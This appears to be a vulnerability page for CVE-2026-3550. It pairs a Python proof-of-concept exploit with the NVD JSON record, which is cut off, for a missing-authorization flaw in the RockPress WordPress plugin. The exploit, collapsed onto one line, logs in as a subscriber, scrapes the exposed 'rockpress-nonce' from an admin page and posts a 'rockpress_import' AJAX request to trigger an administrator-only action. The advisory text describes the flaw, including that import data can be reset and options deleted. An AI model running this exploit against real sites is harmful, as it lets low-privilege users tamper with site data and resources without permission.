CVE-2026-3550

import requests from bs4 import BeautifulSoup # Target configuration target_url = "http://example.com" username = "subscriber" password = "password" session = requests.Session() # Step 1: Login to get authenticated session login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/profile.php' } session.post(target_url + "/wp-login.php", data=login_data) # Step 2: Fetch admin page to extract the nonce response = session.get(target_url + "/wp-admin/profile.php") soup = BeautifulSoup(response.text, 'html.parser') # Extract rockpress-nonce from the localized script object nonce = "" scripts = soup.find_all('script') for script in scripts: if 'rockpress' in script.text: # Simple parsing logic for demonstration start = script.text.find('"rockpress-nonce":"') + len('"rockpress-nonce":"') end = script.text.find('"', start) if start > -1 and end > -1: nonce = script.text[start:end] break if nonce: print(f"[*] Nonce found: {nonce}") # Step 3: Exploit the vulnerability by triggering an import exploit_url = target_url + "/wp-admin/admin-ajax.php" payload = { 'action': 'rockpress_import', 'security': nonce } exploit_resp = session.post(exploit_url, data=payload) print(f"[*] Exploit response status: {exploit_resp.status_code}") print(f"[*] Exploit response body: {exploit_resp.text[:200]}") else: print("[-] Nonce not found. Plugin might not be active or version mismatch.")

{"cve": {"id": "CVE-2026-3550", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:16.390", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RockPress plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0.17. This is due to missing capability checks on multiple AJAX actions (rockpress_import, rockpress_import_status, rockpress_last_import, rockpress_reset_import, and rockpress_check_services) combined with the plugin's nonce being exposed to all authenticated users via an unconditionally enqueued admin script. The plugin enqueues the 'rockpress-admin' script on all admin pages (including profile.php) without any page or capability restrictions, and the nonce for the 'rockpress-nonce' action is passed to this script via wp_localize_script. Since the AJAX handlers only verify this nonce and do not check current_user_can(), any authenticated user, including Subscribers, can extract the nonce from any admin page's HTML source and use it to trigger imports, reset import data (deleting options), check service connectivity, and read import status information. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger resource-intensive import operations, reset import tracking data, and perform system connection checks that should be restricted to administrators."}, {"lang": "es", "value": "El plugin RockPress para WordPress es vulnerable a Autorización Faltante en todas las versiones hasta la 1.0.17, inclusive. Esto se debe a la falta de comprobaciones de capacidad en múltiples acciones AJAX (rockpress_import, rockpress_import_status, rockpress_last_import, rockpress_reset_import y rockpress_check_services) combinado con la exposición del nonce del plugin a todos los usuarios autenticados a través de un script de administración encolado incondicionalmente. El plugin encola el script 'rockpress-admin' en todas las páginas de administración (incluyendo profile.php) sin ninguna restricción de página o capacidad, y el nonce para la acción 'rockpress-nonce' se pasa a este script a través de wp_localize_script. Dado que los manejadores AJAX solo verifican este nonce y no comprueban current_user_can(), cualquier usuario autenticado, incluyendo los Suscriptores, puede extraer el nonce del código fuente HTML de cualquier página de administración y usarlo para activar importaciones, restablecer datos de importación (eliminando opciones), verificar la conectividad del servicio y leer información del estado de la importación. Esto hace posible que atacantes autenticados, con acceso de nivel de Suscriptor y superior, activen operaciones de importación que consumen muchos recursos, restablezcan datos de seguimiento de importación y realicen comprobaciones de conexión del sistema que deberían estar restringidas a los administradores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/admin/admin-ajax.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/admin/admin-scripts.php#L50", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/admin/admin-scripts.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/class-rockpress-import.php#L125", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/class-rockpress-import.php#L145", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/class-rockpress-import.php#L184", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/tags/1.0.17/includes/class-rockpress-import.php#L206", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/trunk/includes/admin/admin-ajax.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ft-rockpress/trunk/includes/admin/admin-scripts.php#L50", "source": "[email protected]"}, {"url": "https:/ ... (truncated)